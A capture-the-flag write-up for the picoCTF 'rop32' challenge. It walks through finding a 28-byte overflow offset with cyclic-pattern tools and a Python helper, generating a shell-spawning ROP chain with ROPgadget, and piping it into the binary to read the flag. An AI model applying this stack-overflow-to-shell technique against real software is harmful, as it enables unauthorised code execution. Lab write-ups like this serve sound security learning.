ctftime

My solutions for various CTF challenges

rop32

Binary Exploitation - Points: 400

Can you exploit the following program to get a flag?

Files provided: vuln, vuln.c

Use ROPgadget to find a ROP chain that spawns a shell.

$ ROPgadget --binary vuln --ropchain --badbytes "0a"

Find the offset at which the overflowing buffer overwrites the saved instruction pointer. Generate a cyclic pattern, feed it to the program under gdb, and read the pattern bytes that end up in the instruction pointer at the SEGFAULT.

$ /opt/metasploit/tools/exploit/pattern_create.rb --length 1024
$ /opt/metasploit/tools/exploit/pattern_offset.rb -q 0x62413961
  [*] Exact match at offset 28
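The lookup pattern_offset does above, as an added example (not the page's sol.py or the Metasploit tools): it rebuilds the Metasploit-style cyclic pattern and recovers the 28-byte offset from the crash value 0x62413961, which is the only length information a crash triage needs to size the overflowed buffer.

```python
import itertools
import struct
from typing import Optional

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"


def pattern_create(length: int) -> bytes:
    """Build a cyclic pattern of `length` bytes in the same order as
    Metasploit's pattern_create.rb: Aa0Aa1...Aa9Ab0... so that every
    3-byte triplet is unique for the first 26*26*10*3 = 20280 bytes."""
    out = bytearray()
    for u, l, d in itertools.product(UPPER, LOWER, DIGIT):
        out += (u + l + d).encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(value: int, length: int = 1024) -> Optional[int]:
    """Return the offset of the 4 pattern bytes that landed in a 32-bit
    register after a crash, or None if they are not in the pattern.
    The register holds the bytes little-endian, so 0x62413961 is the
    ASCII run 'a9Ab'; the raw byte order is tried too in case the value
    was copied as a string rather than read from a register."""
    pattern = pattern_create(length)
    for needle in (struct.pack("<I", value), struct.pack(">I", value)):
        idx = pattern.find(needle)
        if idx != -1:
            return idx
    return None


if __name__ == "__main__":
    # Crash value taken from the writeup above; expected offset is 28.
    print(pattern_offset(0x62413961))
```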

Send 28 bytes of padding followed by the ROP chain from ROPgadget (this is what sol.py prints). Piping cat after the script keeps stdin open, so the spawned shell stays usable and you can cat flag.txt.

$ (python2 sol.py; cat) | ./vuln

flag: picoCTF{rOp_t0_b1n_sH_01a585a7}